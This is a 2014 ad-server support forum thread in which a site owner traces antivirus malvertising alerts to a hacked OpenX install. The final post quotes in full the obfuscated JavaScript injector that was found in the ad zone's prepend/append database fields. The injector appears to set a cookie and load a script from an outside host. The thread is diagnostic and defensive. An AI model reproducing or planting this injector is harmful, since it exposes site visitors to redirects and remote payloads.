anjoyxp Posted January 22, 2014 Report Posted January 22, 2014 Hello, My site using openx for ad server and detect by norton antivirus as "malvertisement website redirect", upgrade to revive ad server not solve this problem, and i not found malicious code on a web page. Anyone have same problem? Thanks. Quote
Ilya Ber Posted January 22, 2014 Report Posted January 22, 2014 Including a link to your site would help us determine the issue. Quote
anjoyxp Posted January 23, 2014 Author Report Posted January 23, 2014 Sorry I am forgot give the link, http://www.gameqq.net A couple of days ago before update Norton Antivirus Definition, the ad server works fine. But after update the Norton block banner image. Thanks. Quote
designxxl Posted January 23, 2014 Report Posted January 23, 2014 I think it has to do with Iframe invocation code (eventhou i installed my revive software on https://) i get this error too. I was hoping you guys could use a slider type of script for this instead of an iframe reload. Would require less server resources and the banner transitions would be smooth. Quote
xtech Posted January 23, 2014 Report Posted January 23, 2014 I get an infection detection error also on Avast in your site: URL: http://ads.gameqq.net/www/delivery/ajs.php?zoneid Infection: JS:Redirector-BJB [Trj] Quote
Erik Geurts Posted January 23, 2014 Report Posted January 23, 2014 Iframe invocation code or any other type is unlikely to be the cause of the alert. Which virus scanner or other tool is it that is reporting a security notification? Quote
anjoyxp Posted January 24, 2014 Author Report Posted January 24, 2014 I have installed Revive ad server to ads.gameqq.net, and post code to page www.gameqq.net, whether the domain ads that cause this problem? My Norton Antivirus 2011 has detect 3 zone banner with invocation code javascript tag. At this time, I disable the "malvertisement" signature from Norton in my computer for unblocking the banner. Quote
Matteo Beccati Posted January 24, 2014 Report Posted January 24, 2014 Someone hacked your OpenX. You can't just expect that upgrading to Revive Adserver could magically clean up the "infection", unless you wiped out OpenX completely and did a fresh install of Revive. You have to carefully check and clean up the filesystem and database to make suer the malware is gone. Quote
anjoyxp Posted January 30, 2014 Author Report Posted January 30, 2014 Finally, I found mallicious code in my Database on table "pre_zone", in column "prepend" and "append". After deleted that code, My Norton Antivirus not blocked Banner again. The code like this: <script>try{$a=~[];$a={___:++$a,$$$$![]+"")[$a],__$:++$a,$_$_![]+"")[$a],_$_:++$a,$_$${}+"")[$a],$$_$$a[$a]+"")[$a],_$$:++$a,$$$_!""+"")[$a],$__:++$a,$_$:++$a,$$__{}+"")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+"")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+"")[$a.__$])+((!$a)+"")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!""+"")[$a.__$])+($a._=(!""+"")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!""+"")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+"\""+$a.$$_$+"="+$a.$$_$+$a._$+$a.$$__+$a._+"\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+"\\"+$a.__$+$a.$_$+$a.$$_+$a.__+";"+$a._+$a.$_$_+"=\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a.$$_+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+"\\"+$a.__$+$a.$$_+$a._$_+"."+$a._+"\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.___+$a.__$+"\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+"\\"+$a.__$+$a.$_$+$a.$$_+$a.__+";\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+"("+$a.$$_$+"._\\"+$a.__$+$a.$$$+$a._$_+"\\"+$a.__$+$a.$$$+$a.___+"==="+$a._+"\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+"\\"+$a.$__+$a.___+"&&\\"+$a.$__+$a.___+$a.$$_$+"."+$a.$$__+$a._$+$a._$+"\\"+$a.__$+$a.$_$+$a._$$+"\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+".\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"\\"+$a.__$+$a.$_$+$a.___+"('_"+$a._+$a.__+"\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+"=')==-"+$a.__$+"\\"+$a.$__+$a.___+"&&\\"+$a.$__+$a.___+$a._+$a.$_$_+".\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"\\"+$a.__$+$a.$_$+$a.___+"('\\"+$a.__$+$a._$_+$a.$$$+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+"\\"+$a.__$+$a.$$_+$a.$$$+"\\"+$a.__$+$a.$$_+$a._$$+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a.__$+$a.$$_+"\\"+$a.__$+$a._$_+$a.$__+"\\"+$a.$__+$a.___+"')>"+$a.___+"\\"+$a.$__+$a.___+"&&\\"+$a.$__+$a.___+$a._+$a.$_$_+".\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"\\"+$a.__$+$a.$_$+$a.___+"('\\"+$a.__$+$a.__$+$a.$_$+"\\"+$a.__$+$a._$_+$a._$$+"\\"+$a.__$+$a.__$+$a.__$+"\\"+$a.__$+$a.___+$a.$_$+"\\"+$a.$__+$a.___+"')>"+$a.___+")\\"+$a.$__+$a.___+"{"+$a.$$_$+"._\\"+$a.__$+$a.$$$+$a._$_+"\\"+$a.__$+$a.$$$+$a.___+"="+$a.__$+";"+$a.$$_$+"."+$a.$$__+$a._$+$a._$+"\\"+$a.__$+$a.$_$+$a._$$+"\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+"='__"+$a._+$a.__+"\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+"="+$a.__$+";\\"+$a.$__+$a.___+$a.$$$_+"\\"+$a.__$+$a.$$$+$a.___+"\\"+$a.__$+$a.$$_+$a.___+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+"\\"+$a.__$+$a.$$_+$a._$$+"=\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+",\\"+$a.$__+$a.___+$a.___+$a.__$+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+"\\"+$a.__$+$a.$_$+$a.$$_+"\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+"\\"+$a.$__+$a.___+$a.___+$a.___+":"+$a.___+$a.___+":"+$a.___+$a.___+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a._$_+$a.$_$+"\\"+$a.__$+$a._$_+$a.$__+"\\"+$a.__$+$a.___+$a._$$+";\\"+$a.$__+$a.___+"\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+"\\"+$a.__$+$a.$_$+$a.___+"=/';"+$a.$$_$+".\\"+$a.__$+$a.$$_+$a.$$$+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+"")[$a._$_]+"\\"+$a.__$+$a.$_$+$a.$$_+"(\\\"<\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+"\\"+$a.__$+$a.$$_+$a._$_+"\\\"+\\\"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$$_+$a.___+$a.__+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a.$$_+$a._$$+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"='\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+"\\"+$a.__$+$a.$$_+$a.___+"://"+$a.$_$$+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$_$+$a.$$_+"\\"+$a.__$+$a.$$_+$a._$$+"."+$a.$_$$+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$$$+$a._$_+"/"+$a.$$__+$a.$___+$a.$__+$a.$___+$a.__$+$a.$$$$+$a.$_$+$a.___+".\\"+$a.__$+$a.$_$+$a._$_+"\\"+$a.__$+$a.$$_+$a._$$+"?"+$a.$$__+"\\"+$a.__$+$a.$$_+$a.___+"="+$a.$_$_+$a.$$_$+"\\"+$a.__$+$a.$$_+$a._$$+".\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+"\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+"\\"+$a.__$+$a.$$_+$a.__$+"\\"+$a.__$+$a.$$_+$a.__$+".\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.__+"'></\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.$_$+$a.__$+"\\\"+\\\"\\"+$a.__$+$a.$$_+$a.___+$a.__+">\\\");}"+"\"")())();}catch(e){}</script><!--vcwrz--> Many Thanks to you all for the clue and advise. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.